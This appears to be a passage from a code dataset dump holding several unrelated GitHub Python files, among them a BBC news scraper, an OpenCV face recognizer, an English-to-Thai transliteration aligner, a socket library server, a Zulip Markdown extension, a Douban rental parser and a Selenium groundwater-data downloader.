1","repo_name":"yousafsabir/python","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8403773815","text":"import re\nfrom datetime import datetime\nimport sys\nimport urlparse\nimport lxml.html\nimport urllib2\n\nimport site\nsite.addsitedir(\"../pylib\")\nfrom BeautifulSoup import BeautifulSoup, Comment\nfrom JL import ukmedia, ScraperUtils\n\n\n\n\n\n\ndef Extract( html, context, **kw ):\n art = context\n parser = lxml.html.HTMLParser(encoding='utf-8')\n doc = lxml.html.document_fromstring(html, parser, base_url=art['srcurl'])\n\n #BBC has more than one layout...\n if len(doc.cssselect('article.story'))>0:\n return extract_sports(art,doc)\n\n\n og_type = doc.cssselect('head meta[property=\"og:type\"]')\n if len(og_type)>0:\n foo = og_type[0].get('content')\n if foo != u'article':\n ukmedia.DBUG2(\"SKIP og:type '%s' %s\\n\" % (foo,art['srcurl']))\n return None\n\n article = doc.cssselect('.story-body')[0]\n\n h1 = article.cssselect('h1')[0]\n art['title'] = ukmedia.FromHTMLOneLine(unicode(lxml.html.tostring(h1)))\n\n art['byline'] = u''\n authors = article.cssselect('.byline')\n if len(authors)>0:\n parts = [ukmedia.FromHTMLOneLine(a[0].text_content()) for a in authors]\n art['byline'] = u', '.join(parts)\n\n dt = article.cssselect('.date')[0].get('data-seconds')\n art['pubdate'] = datetime.utcfromtimestamp(int(dt))\n\n\n foo = article.cssselect('[property=\"articleBody\"]')\n if len(foo)==0:\n foo = article.cssselect('.map-body')\n body_div = foo[0]\n art['content'] = ukmedia.SanitiseHTML(unicode(lxml.html.tostring(body_div)))\n\n art['srcorgname']=u'bbcnews'\n return art\n\n\n\n# layout used by sports (and others?)\ndef extract_sports(art, doc):\n article = doc.cssselect('article.story')[0]\n\n h1 = article.cssselect('h1')[0]\n art['title'] = ukmedia.FromHTMLOneLine(unicode(lxml.html.tostring(h1)))\n\n byline = article.cssselect('.story__byline .gel-long-primer')[0]\n art['byline'] = ukmedia.FromHTMLOneLine(byline.text_content())\n\n dt = article.cssselect('.timestamp time')[0].get('data-timestamp')\n art['pubdate'] = datetime.utcfromtimestamp(int(dt))\n\n body_div = article.cssselect('.story-body')[0]\n art['content'] = ukmedia.SanitiseHTML(unicode(lxml.html.tostring(body_div)))\n\n art['srcorgname']=u'bbcnews'\n return art\n\n\ndef FindArticles(sesh):\n \"\"\" get current active articles by scanning each section page \"\"\"\n\n\n start_page = \"http://www.bbc.co.uk/news\"\n art_url_pat = re.compile(r\".*/[^/]*\\d{4}[^/]*/?$\", re.I)\n navsel = '.navigation-wide-list a'\n nav_blacklist = []\n domain_whitelist = ('www.bbc.co.uk','www.bbc.com')\n# article_blacklist = ['/picture/','/gallery','/live/','/video/','/audio/','/ng-interactive/']\n article_blacklist = []\n\n urls = ScraperUtils.GenericFindArtLinks(start_page,domain_whitelist,navsel,nav_blacklist,art_url_pat)\n arts = []\n for url in urls:\n good = True\n for blacklisted in article_blacklist:\n if blacklisted in url:\n good = False\n if good:\n arts.append(ContextFromURL(url))\n\n return arts\n\n\ndef TidyURL( url ):\n \"\"\" Tidy up URL - trim off any extra cruft (eg rss tracking stuff) \"\"\"\n o = urlparse.urlparse( url )\n url = urlparse.urlunparse( (o[0],o[1],o[2],'','','') );\n return url\n\n\ndef ContextFromURL( url ):\n \"\"\"Build up an article scrape context from a bare url.\"\"\"\n\n url = TidyURL(url)\n\n context = {}\n context['permalink'] = url\n context['srcurl'] = url\n context['srcorgname'] = u'bbcnews'\n context['lastseen'] = datetime.now()\n return context\n\n\nif __name__ == \"__main__\":\n ScraperUtils.scraper_main( FindArticles, ContextFromURL, Extract )\n\n","repo_name":"bcampbell/journalisted","sub_path":"jl/scraper/bbcnews.py","file_name":"bbcnews.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"71396790551","text":"import os\nimport numpy as np \nimport math\nimport time\nfrom matplotlib import pyplot as plt \nimport cv2\n\ndef collect_dataset():\n\timages = []\n\tlabels = []\n\tlabels_dic = {}\n\tpeople = [person for person in os.listdir(\"People/\")]\n\n\tfor i, person in enumerate(people):\n\t\tlabels_dic[i] = person\n\t\tfor image in os.listdir(\"People/\" + person):\n\t\t\timages.append(cv2.imread(\"People/\" + person + \"/\" + image, 0))\n\t\t\tlabels.append(i)\n\n\treturn (images, np.array(labels), labels_dic)\n\nimages, labels, labels_dic = collect_dataset()\n\nrec_eig = cv2.createEigenFaceRecognizer()\nrec_eig.train(images, labels)\n\nrec_fisher = cv2.createFisherFaceRecognizer()\nrec_fisher.train(images, labels)\n\nrec_lbph = cv2.createLBPHFaceRecognizer()\nrec_lbph.train(images, labels)\n\nprint(\"Trained Successfully!\")\n\nface = cv2.imread(\"7.jpg\", cv2.COLOR_BGR2GRAY)\n\npred, conf = rec_eig.predict(face)\nprint(\"Eigen Prediction-->\" + labels_dic[pred].capitalize() + \"\\tConfidence-->\" + str(conf) + \"\\n\")\n\npred, conf = rec_fisher.predict(face)\nprint(\"Fisher Prediction-->\" + labels_dic[pred].capitalize() + \"\\tConfidence-->\" + str(conf) + \"\\n\")\n\npred, conf = rec_lbph.predict(face)\nprint(\"LBPH Prediction-->\" + labels_dic[pred].capitalize() + \"\\tConfidence-->\" + str(conf) + \"\\n\")","repo_name":"ck090/FaceRecognition_Haar-Cascades_and_LBPH","sub_path":"OpenCV/recog.py","file_name":"recog.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"10246765350","text":"import re #นำเข้า regex : คือการกำหนดรูปแบบหรือกลุ่มคำ เพื่อเอาไว้ใช้ค้นหาข้อความต่างๆตามที่เราต้องการ\n\n# ฟังก์ชันการแปลง list เป็น string\ndef listToString(s): \n string = ''\n for char in s: \n string += char \n return string \n\n# ฟังก์ชันการแปลง list เป็น string พร้อมเครื่องหมายทับ ( / ) ่ต่อท้าย\ndef listToStringWithSlash(s): \n string = '' \n for char in s: \n string += char + '/' \n return string \ndef listToStringWithSpace(s): \n string = '' \n for char in s: \n string += char + ' ' \n if string[-1] == ' ':\n string = string[:-1]\n return string \n\n#การตัดตัวอักษรภาษาอังกฤษ\ndef alignment_en(text_en):\n \n #กำหนดการตัดพยัญชนะภาษาอังกฤษเมื่อพบพยัญชนะต่อไปนี้\n consonant_en = 'thm|sch|ch|ck|gh|gn|kh|ph|qu|rh|sh|th|wh|b|c|d|f|g|h|j|k|l|m|n|p|q|r|s|t|v|w|x|y|z' \n #กำหนดการตัดสระภาษาอังกฤษเมื่อพบสระต่อไปนี้\n vowel_en = 'ai|ee|ea|eau|ei|eu|ie|io|oa|oe|oo|ou|ui|aea|ae|eou|aa|ao|au|eo|eu|ia|iu|oi|ua|ue|a|e|i|o|u|y'\n\n convo_en = \"r'\" + consonant_en + '|' + vowel_en +\"'\" #กำหนดรูปแบบในการค้นหา\n\n result = re.findall(convo_en, text_en) #เป็นคำสั่งที่ใช้ค้นหา โดย return กลับมาเป็น list ของผลลัพท์ทุกตัว\n if(len(result) == 1):\n return result\n if(result[0] == 'sch'):\n result[0] = 's'\n result.insert(1, 'ch')\n if (result[0] == 'p' and result[1] in {'n','t','s'}):\n result[0] = 'p' + result[1]\n del result[1]\n if (result[0] == 'k' and result[1] == 'n'):\n result[0] = 'k' + result[1]\n del result[1]\n return result\n\n#การตัดตัวอักษรไทย\ndef alignment_th(words):\n words = re.findall(r'[ก-ฮ]|ะ|า|ิ|ี|ุ|ู|เ|แ|โ|ไ|ใ|์|็|ั|ึ', words) #กำหนดการตัดพยัญชนะและสระภาษาไทย พร้อมทั้งกำหนดรูปแบบการค้นหา\n \n #ย้ายตำแหน่งการันต์ให้อยู่บนตัวอักษรก่อนหน้า ค/า/ร/ ์ > ค/า/ร์\n index = 0\n for char in words:\n if char in '์':\n words[index-1] = words[index-1] + words[index]\n words.remove('์')\n index += 1\n \n words = words + ['',''] #เติมค่าว่าง 2 ค่าลงใน list เพื่อป้องกัน loop index out of range เพราะมี index+2 ในขั้นตอนถัดไป\n \n size = len(words)-1 #กำหนดจำนวนรอบที่จะ loop ตามขนาดของ list-1\n \n for index in range (size): #ย้ายตำแหน่งสระประสม\n \n if index != 0 and index < size-1: #ค้นหาสระประสม 2 ตัวอักษร\n currentChar = words[index]\n previousChar = words[index-1]\n nextChar = words[index+1]\n nextChar2 = words[index+2]\n \n if ((previousChar == 'เ' and nextChar == 'อ') or \n (previousChar == 'เ' and nextChar == 'า') or\n (previousChar == 'เ' and nextChar == '็') or\n (previousChar == 'แ' and nextChar == '็') or\n (previousChar == 'เ' and nextChar == 'ิ')): #สระประสม 2 ตัวอักษรในภาษาอังกฤษ เ.อ > ไทเกอร์ , เ.า > เบราว์เซอร์, เ.็ > เจ็ต, แ.็ > แบล็ก, เ.ิ > เลิฟ\n # ย้ายตำแหน่งของสระประสมให้ไปอยู่หลังพยัญชนะของสระนั้น เช่น เ/ล/ ิ/ฟ > ล/เ.ิ>ฟ\n words[index] = previousChar + '.' + nextChar\n words[index-1] = currentChar\n words.append('')\n del words[index+1]\n \n if (previousChar == 'เ' and nextChar == 'ี' and nextChar2 == \"ย\"): #ค้นหาสระประสม 3 ตัวอักษรในภาษาอังกฤษ เ.ีย > นาตาเลีย\n # ย้ายตำแหน่งของสระประสมให้ไปอยู่หลังพยัญชนะของสระนั้น เช่น เ/ม/ ี/ย/ร์ > ม/เ.ีย/ร์\n words[index] = previousChar + '.' + nextChar + nextChar2 \n words[index-1] = currentChar\n del words[index+2]\n del words[index+1]\n words.append('')\n words.append('')\n \n if(currentChar == 'ิ' and nextChar == 'ว'):\n words[index] = '.' + currentChar + nextChar\n del words[index+1]\n words.append('')\n \n #ย้ายตำแหน่งสระเดี่ยว\n index = 0\n for char in words:\n if char in {'เ','แ','โ','ไ'}: #สระเดี่ยวในภาษาอังกฤษ เ. > เดย์, แ. > แคต, โ. > โซโลมอน, ไ. > ไอโอดีน\n # ย้ายตำแหน่งของสระเดี่ยวให้ไปอยู่หลังพยัญชนะของสระนั้น เช่น แ/ค/ต > ค/แ./ต\n temp = words[index]\n words[index] = words[index+1]\n words[index+1] = temp + '.'\n index +=1\n \n# #คำสั่งลบค่าว่างใน list \n# size = len(words)-1\n# for index in range(size+1,0,-1):\n# if words[index-1] == '':\n# words.remove('')\n \n #สระที่มีพยัญชนะต้นเป็น 'อ' \n if words[0] == 'อ':\n if words[1] in {'เ.','แ.','ไ.','โ.'}:\n words[0] = words[1] + 'อ'\n removeDot = re.findall(r'[ก-ฮ]|ะ|า|ิ|ี|ุ|ู|เ|แ|โ|ไ|ใ|์|็|ั', words[0])\n words[0] = listToString(removeDot)\n del words[1]\n elif words[1] in {'ะ','า','อ','ิ','ี','ั'}:\n words[0] = 'อ' + words[1]\n del words[1]\n index = 0 \n\n #คำสั่งลบค่าว่างใน list \n size = len(words)-1\n for index in range(size+1,0,-1):\n if words[index-1] == '':\n words.remove('') \n return words\n","repo_name":"tanukiraccoon/EN-to-TH-Transliteration","sub_path":"src/word_alignment.py","file_name":"word_alignment.py","file_ext":"py","file_size_in_byte":7237,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11518339112","text":"import sqlite3\n\nconnection = sqlite3.connect(\"MyDatabase.db\")\n\ncursor = connection.cursor()\n\n# Lấy data ra\ncursor.execute(\"\"\"\nSELECT MaLop, Tenlop, SoGio, HocPhi FROM LopHoc \nORDER BY HocPhi ASC, SoGio DESC\n\"\"\")\n\nrows = cursor.fetchall()\nprint(rows)\nprint(f\"Tổng cộng {len(rows)} dòng\")\nfor item in rows:\n print(item[0], item[1], item[2], item[3])\n\nconnection.close()\n","repo_name":"pynhatnghe/pynhatnghe.github.io","sub_path":"python11112021/buoi08_30.11_sqlite/DemoDatabase.py","file_name":"DemoDatabase.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31421829437","text":"'''\nThis script extracts the audio recording from the video file and stores it in a wav file\n'''\nimport logging\nimport os\nimport shutil\n\n\ndef run_extracting_audio(parallel_run_settings):\n '''\n Extract audio only from the video file\n :return: none\n '''\n logging.getLogger().setLevel(logging.INFO)\n\n video_list = []\n for file in os.listdir(parallel_run_settings['avi_path']):\n if file.endswith(\".avi\"):\n video_list.append(file)\n\n video_i = video_list[0]\n for video_i in video_list:\n video_path = os.path.join(parallel_run_settings['avi_path'], video_i)\n video_path = os.path.splitext(video_path)[0]\n os.system(\"ffmpeg -i {0}.avi -f wav -ab 192000 -ac 1 -vn {0}.wav\".format(video_path))\n\n shutil.move(video_path + '.wav',\n parallel_run_settings['wav_path'] + '/' + os.path.splitext(video_i)[0] + '.wav')\n\n log_text = \"Completed extracting audio for \"\n logging.info(log_text + video_i)\n\nif __name__ == \"__main__\":\n run_extracting_audio()\n","repo_name":"SpectData/MONAH","sub_path":"Python/Data_Preprocessing/Stage_1/FFMpeg/execute_extracting_audio.py","file_name":"execute_extracting_audio.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"40435890130","text":"\ndef main():\n people_number = int(input(\"Hello, how many people are in the dinner group:\"))\n if people_number > 8:\n print(\"Sorry, you will need to wait for a table.\")\n else:\n print(\"The table is ready, please come in!\")\n \n \n\n\nif __name__ == \"__main__\":\n main()","repo_name":"fernunex/Theory","sub_path":"Chapter_7_Inputs/restaurant_seating.py","file_name":"restaurant_seating.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4600934078","text":"import socket\nimport pickle\nimport communication\nimport time\nfrom commands import *\n# library files\nfrom lib_files.book import Book\nfrom lib_files.reader import Reader\nfrom lib_files.library import Library\n\n# create library, readers: start\ntst_lib = Library( [], [] )\n\"\"\"\nbooks' data from here:\nhttps://www.penguin.co.uk/articles/2018/100-must-read-classic-books.html\n\"\"\"\n# add books\ntst_lib.add_book( Book( 1, \"Pride and Prejudice\", \"Jane Austen\", 1813 ) )\ntst_lib.add_book( Book( 2, \"To Kill a Mockingbird\", \"Harper Lee\", 1960 ) )\ntst_lib.add_book( Book( 3, \"The Great Gatsby\", \"F. Scott Fitzgerald\", 1925 ) )\ntst_lib.add_book( Book( 4, \"One Hundred Years of Solitude\", \"Gabriel García Márquez\", 1967 ) )\ntst_lib.add_book( Book( 5, \"In Cold Blood\", \"Truman Capote\", 1965 ) )\ntst_lib.add_book( Book( 6, \"Wide Sargasso Sea\", \"Jean Rhys\", 1966 ) )\ntst_lib.add_book( Book( 7, \"I Capture The Castle\", \"Dodie Smith\", 1948 ) )\ntst_lib.add_book( Book( 8, \"Jane Eyre\", \"Charlotte Bronte\", 1847 ) )\ntst_lib.add_book( Book( 9, \"Crime and Punishment\", \"Fyodor Dostoevsky\", 1866 ) )\ntst_lib.add_book( Book( 10, \"The Secret History\", \"Donna Tartt\", 1992 ) )\n# add readers\ntst_lib.add_reader( Reader( 1, \"Anton\", \"Skazka\", 23 ) )\ntst_lib.add_reader( Reader( 2, \"Alex\", \"Berezka\", 25 ) )\ntst_lib.add_reader( Reader( 3, \"Igor\", \"Talalaev\", 30 ) )\n# create library, readers: end\n\n_socket = socket.socket()\n_socket.bind( (socket.gethostname(), 56+13) )\n_socket.listen(1)\n_commands = \"List of possible commands:\\nGET_ALL_BOOKS_IN_LIBRARY\\nGET_ALL_AVAILABLE_BOOKS\\n\\\nADD_NEW_BOOK\\nDELETE_BOOK\\nGET_ALL_READERS\\nTAKE_A_BOOK\\nRETURN_A_BOOK\\n\"\nwhile True:\n clientsocket, address = _socket.accept()\n print(f\"Connection from {address} has been established.\")\n print(_commands)\n communication.sendMsg( _commands, clientsocket)\n time1 = time.time()\n while True:\n response = communication.readMsg(clientsocket)\n if(response):\n time1 = time.time()\n # handling queries to library from client\n if(response == GET_ALL_BOOKS_IN_LIBRARY):\n print(\"Ask for all book's list\")\n communication.sendMsg( tst_lib.all_books_server_ver(), clientsocket)\n elif(response == GET_ALL_AVAILABLE_BOOKS):\n print(\"Ask for available books\")\n communication.sendMsg(tst_lib.books_in_library_server_ver(), clientsocket)\n elif(response == ADD_NEW_BOOK):\n print(\"Add a book\")\n new_book = communication.readMsg(clientsocket)\n tst_lib.add_book(new_book)\n elif(response == DELETE_BOOK):\n print(\"Delete a book\")\n book_to_delete_ID = communication.readMsg(clientsocket)\n tst_lib.delete_book( int(book_to_delete_ID) )\n elif(response == GET_ALL_READERS):\n print(\"Ask for all readers\")\n communication.sendMsg(tst_lib.return_readers(), clientsocket)\n elif(response == TAKE_A_BOOK):\n print(\"Take a book\")\n book_ID, reader_ID = communication.readMsg(clientsocket)\n tst_lib.give_to_reader_via_IDs(int(book_ID), int(reader_ID))\n print(tst_lib.return_readers())\n elif(response == RETURN_A_BOOK):\n print(\"Take back a book\")\n book_ID, reader_ID = communication.readMsg(clientsocket)\n tst_lib.take_from_reader_via_IDs(int(book_ID), int(reader_ID))\n print(tst_lib.return_readers())\n if(time.time() - time1 > 7):\n clientsocket.close()\n print('Connection closed...')\n break","repo_name":"AndyKychinskey/Python_Course_2021","sub_path":"HW6/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43561113301","text":"class Money:\n def __init__(self,currency,whole_money, coins):\n self.currency = currency\n self.whole_money = whole_money\n self.coins = coins\n\n def info(self):\n print(f'whole_money: {self.whole_money}\\ncoins: {self.coins}\\ncurrency: {self.currency}')\n\n def redact(self):\n user = input('Какой параметр ты хочешь редактировать\\n')\n if user == 'currency':\n user = input('На какую валюту ты хочешь поменять?\\n')\n self.currency = user\n return 'замена произошла успешно'\n if user == 'whole_money':\n user = int(input('Ведите сумму\\n'))\n self.whole_money = user\n return 'замена произошла успешно'\n if user == 'coins':\n user = input('Введите копейки\\n')\n self.coins = int(user)\n return 'замена произошла успешно'\n\n\nmoney = Money(\"гривны\", 60, 40)\nmoney.info()\nmoney.redact()\nmoney.info()\n","repo_name":"rkAPCHA/homework_mystat","sub_path":"06.02.2022 часть 2/class Money.py","file_name":"class Money.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24759204971","text":"import re\n\nfrom markdown.extensions import Extension\nfrom markdown.preprocessors import Preprocessor\nfrom typing import Any, Dict, Optional, List, Tuple\nimport markdown\n\nSTART_TABBED_SECTION_REGEX = re.compile(r'^\\{start_tabs\\}$')\nEND_TABBED_SECTION_REGEX = re.compile(r'^\\{end_tabs\\}$')\nTAB_CONTENT_REGEX = re.compile(r'^\\{tab\\|\\s*(.+?)\\s*\\}$')\n\nCODE_SECTION_TEMPLATE = \"\"\"\n
\n{nav_bar}\n
\n{blocks}\n
\n
\n\"\"\".strip()\n\nNAV_BAR_TEMPLATE = \"\"\"\n
    \n{tabs}\n
\n\"\"\".strip()\n\nNAV_LIST_ITEM_TEMPLATE = \"\"\"\n
  • {name}
  • \n\"\"\".strip()\n\nDIV_TAB_CONTENT_TEMPLATE = \"\"\"\n
    \n{content}\n
    \n\"\"\".strip()\n\n# If adding new entries here, also check if you need to update\n# tabbed-instructions.js\nTAB_DISPLAY_NAMES = {\n 'desktop-web': 'Desktop/Web',\n 'ios': 'iOS',\n 'android': 'Android',\n 'mac': 'macOS',\n 'windows': 'Windows',\n 'linux': 'Linux',\n 'python': 'Python',\n 'js': 'JavaScript',\n 'curl': 'curl',\n 'zulip-send': 'zulip-send',\n\n 'cloud': 'HipChat Cloud',\n 'server': 'HipChat Server or Data Center',\n}\n\nclass TabbedSectionsGenerator(Extension):\n def extendMarkdown(self, md: markdown.Markdown, md_globals: Dict[str, Any]) -> None:\n md.preprocessors.add(\n 'tabbed_sections', TabbedSectionsPreprocessor(md, self.getConfigs()), '_end')\n\nclass TabbedSectionsPreprocessor(Preprocessor):\n def __init__(self, md: markdown.Markdown, config: Dict[str, Any]) -> None:\n super(TabbedSectionsPreprocessor, self).__init__(md)\n\n def run(self, lines: List[str]) -> List[str]:\n tab_section = self.parse_tabs(lines)\n while tab_section:\n nav_bar = self.generate_nav_bar(tab_section)\n content_blocks = self.generate_content_blocks(tab_section, lines)\n rendered_tabs = CODE_SECTION_TEMPLATE.format(\n nav_bar=nav_bar, blocks=content_blocks)\n\n start = tab_section['start_tabs_index']\n end = tab_section['end_tabs_index'] + 1\n lines = lines[:start] + [rendered_tabs] + lines[end:]\n tab_section = self.parse_tabs(lines)\n return lines\n\n def generate_content_blocks(self, tab_section: Dict[str, Any], lines: List[str]) -> str:\n tab_content_blocks = []\n for index, tab in enumerate(tab_section['tabs']):\n start_index = tab['start'] + 1\n try:\n # If there are more tabs, we can use the starting index\n # of the next tab as the ending index of the previous one\n end_index = tab_section['tabs'][index + 1]['start']\n except IndexError:\n # Otherwise, just use the end of the entire section\n end_index = tab_section['end_tabs_index']\n\n content = '\\n'.join(lines[start_index:end_index]).strip()\n tab_content_block = DIV_TAB_CONTENT_TEMPLATE.format(\n data_language=tab['tab_name'],\n # Wrapping the content in two newlines is necessary here.\n # If we don't do this, the inner Markdown does not get\n # rendered properly.\n content='\\n{}\\n'.format(content))\n tab_content_blocks.append(tab_content_block)\n return '\\n'.join(tab_content_blocks)\n\n def generate_nav_bar(self, tab_section: Dict[str, Any]) -> str:\n li_elements = []\n for tab in tab_section['tabs']:\n li = NAV_LIST_ITEM_TEMPLATE.format(\n data_language=tab.get('tab_name'),\n name=TAB_DISPLAY_NAMES.get(tab.get('tab_name')))\n li_elements.append(li)\n return NAV_BAR_TEMPLATE.format(tabs='\\n'.join(li_elements))\n\n def parse_tabs(self, lines: List[str]) -> Optional[Dict[str, Any]]:\n block = {} # type: Dict[str, Any]\n for index, line in enumerate(lines):\n start_match = START_TABBED_SECTION_REGEX.search(line)\n if start_match:\n block['start_tabs_index'] = index\n\n tab_content_match = TAB_CONTENT_REGEX.search(line)\n if tab_content_match:\n block.setdefault('tabs', [])\n tab = {'start': index,\n 'tab_name': tab_content_match.group(1)}\n block['tabs'].append(tab)\n\n end_match = END_TABBED_SECTION_REGEX.search(line)\n if end_match:\n block['end_tabs_index'] = index\n break\n return block\n\ndef makeExtension(*args: Any, **kwargs: str) -> TabbedSectionsGenerator:\n return TabbedSectionsGenerator(kwargs)\n","repo_name":"18-2-SKKU-OSS/2018-2-OSS-L5","sub_path":"zerver/lib/bugdown/tabbed_sections.py","file_name":"tabbed_sections.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"1127377615","text":"class Solution:\r\n # @param A : list of integers\r\n # @param B : integer\r\n # @return an integer\r\n def solve(self, A, B):\r\n A.sort()\r\n \r\n diff = A[-1] - A[0]\r\n for i in range(len(A) - 1):\r\n min_height = min(A[0] + B, A[i + 1] - B)\r\n max_height = max(A[i] + B, A[-1] - B)\r\n diff = min(diff, max_height - min_height)\r\n \r\n return diff\r\n","repo_name":"achie27/cp","sub_path":"arrays/minimise_max_height_diff.py","file_name":"minimise_max_height_diff.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11951106407","text":"class Aluno:\n def __init__(self, ra, nome, periodo):\n self.ra = ra\n self.nome = nome\n self.periodo = periodo\n\n def formatAluno(self):\n text = f'RA: {self.ra}\\n' + \\\n f'Nome: {self.nome}\\n' + \\\n f'Periodo: {self.periodo}\\n' + \\\n '==================================================\\n'\n\n return text\n","repo_name":"MSechineli/Sharding-SD-2022-1","sub_path":"pythongui/classes/aluno.py","file_name":"aluno.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72760631512","text":"import json\nimport logging\nimport re\nfrom datetime import datetime\n\nfrom bs4 import BeautifulSoup\n\n\ndef parse_list(html):\n \"\"\"\n 解析帖子列表\n \"\"\"\n soup = BeautifulSoup(html, \"html.parser\")\n rows = soup.select('table[class=\"olt\"] tr[class=\"\"]')\n posts = []\n for row in rows:\n link = row.select_one('td[class=\"title\"] a')\n time_text = row.select_one('td[class=\"time\"]').get_text()\n if re.match(r'\\d{2}-\\d{2} \\d{2}:\\d{2}', time_text):\n time_text = str(datetime.now().year) + \"-\" + time_text\n elif re.match(r'\\d{4}-\\d{2}-\\d{2}', time_text):\n # 跨年的日期,豆瓣显示的是 年-月-日\n time_text += ' 00:00'\n r_count = row.select_one('td[class=\"r-count\"]').get_text()\n author = row.select_one('td:nth-child(2) a')\n posts.append({\n \"title\": link['title'],\n \"url\": link['href'],\n \"reply_count\": int(r_count) if r_count else 0,\n \"time\": datetime.strptime(time_text, '%Y-%m-%d %H:%M'),\n \"author\": {\n \"name\": author.get_text(),\n \"url\": author['href']\n }\n })\n return posts\n\n\ndef parse_detail(html):\n \"\"\"\n 解析帖子详情\n \"\"\"\n soup = BeautifulSoup(html, \"html.parser\")\n title = soup.h1.get_text(strip=True)\n content = soup.find(\"div\", class_='topic-richtext').get_text(\"\\n\", True)\n author = soup.select_one('#topic-content h3 a')\n create_time = soup.select_one('#topic-content h3 span.create-time').get_text()\n rent = extract_rent(title + \"\\n\" + content)\n return {\n \"title\": title,\n \"rent\": rent,\n \"create_time\": datetime.strptime(create_time, '%Y-%m-%d %H:%M:%S'),\n \"content\": content,\n \"author\": {\n \"name\": author.get_text(),\n \"url\": author['href']\n }\n }\n\n\ndef extract_rent(text):\n \"\"\"\n 从文本中提取租金\n \"\"\"\n # 连续3-5位数字及前后2个字符的内容\n it = re.finditer(r\"(.[\\s\\D])(\\d{4})([\\s\\D].?)\", text)\n for match in it:\n # 过滤干扰项\n if re.match(r\"押金|补贴\", match.group(1)):\n continue\n if re.match(r\"米|年\", match.group(3)):\n continue\n return int(match.group(2))\n logging.warning(\"租金提取失败\\n%s\", text)\n","repo_name":"iszhouhua/douban-group","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"12698495912","text":"\"\"\"\nThere are 5 students in this class whose names and grades \nare assembled to build the following list:\n\npython students = [['Harry', 37.21], ['Berry', 37.21], \n ['Tina', 37.2], ['Akriti', 41], \n ['Harsh', 39]]\n\nThe lowest grade 37.2 of belongs to Tina. The second lowest \ngrade of belongs to both Harry and Berry, so we order \ntheir names *alphabetically* and *print* each name on a new line.\n\ninput:\n\t5\n\tHarry\n\t37.21\n\tBerry\n\t37.21\n\tTina\n\t37.2\n\tAkriti\n\t41\n\tHarsh\n\t39\n\noutput:\n\tBerry\n\tHarry\n\"\"\"\n\nif __name__ == '__main__':\n records = []\n for i in range(int(input())):\n name = input()\n score = float(input())\n student = [name, score]\n records.append(student)\n # print(records)\n \n scores = [x[1] for x in records]\n # print(scores)\n lst_scores = list(set(scores))\n lst_scores.sort()\n # print(lst_scores)\n sceond_lowest_score = lst_scores[1]\n \n second_lowest_stu = [x[0] for x in records if x[1] == sceond_lowest_score]\n second_lowest_stu.sort()\n for student in second_lowest_stu:\n print(student)","repo_name":"JeremiahZhang/gopython","sub_path":"python-daily/nested_lists.py","file_name":"nested_lists.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"25395559440","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 11 02:42:03 2021\n\n@author: aliasger\n\"\"\"\n\n# Importing relevant libraries\nimport pandas as pd\nfrom selenium import webdriver\nimport os\nimport time\n\n# Loading meta data from csv file\nmeta_data = pd.read_csv(\"scrape_meta_data.csv\")\n\nmeta_data = meta_data.to_dict()\nmeta_data_id = meta_data[\"ID\"]\nmeta_data_web = meta_data[\"Web No.\"]\n\nrecord_no = len(meta_data_id)\n\n# Setting up chromedriver profile for selenium\nprefs = {\n'download.default_directory': '/Users/aliasger/Desktop/Scraping',\n'download.prompt_for_download': False,\n'download.extensions_to_open': 'xml',\n'safebrowsing.enabled': True\n}\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option('prefs',prefs)\noptions.add_argument(\"start-maximized\")\n# options.add_argument(\"disable-infobars\")\noptions.add_argument(\"--disable-extensions\")\noptions.add_argument(\"--safebrowsing-disable-download-protection\")\noptions.add_argument(\"safebrowsing-disable-extension-blacklist\")\ndriver = webdriver.Chrome(options=options, executable_path=r'/usr/local/bin/chromedriver')\n\n#Iterating and scraping through required piezometer data\nfor i in range(record_no):\n ID = meta_data_id[i]\n Web = meta_data_web[i]\n \n #https://sig.mapama.gob.es/WebServices/clientews/intranet/default.aspx?nombre=PIEZOMETROS&claves=DGAGUA.PIEZOMETROS.PIE_NUMPIE&valores=2980&origen=2&op=Exportar\n \n target_url = 'https://sig.mapama.gob.es/WebServices/clientews/intranet/default.aspx?nombre=PIEZOMETROS&claves=DGAGUA.PIEZOMETROS.PIE_NUMPIE&valores='+str(Web)+'&origen=2&op=Exportar'\n driver.get(target_url)\n \n time.sleep(5)\n \n uniqueName = str(ID)+\".xml\"\n os.rename(\"FichaExportacion.xml\", 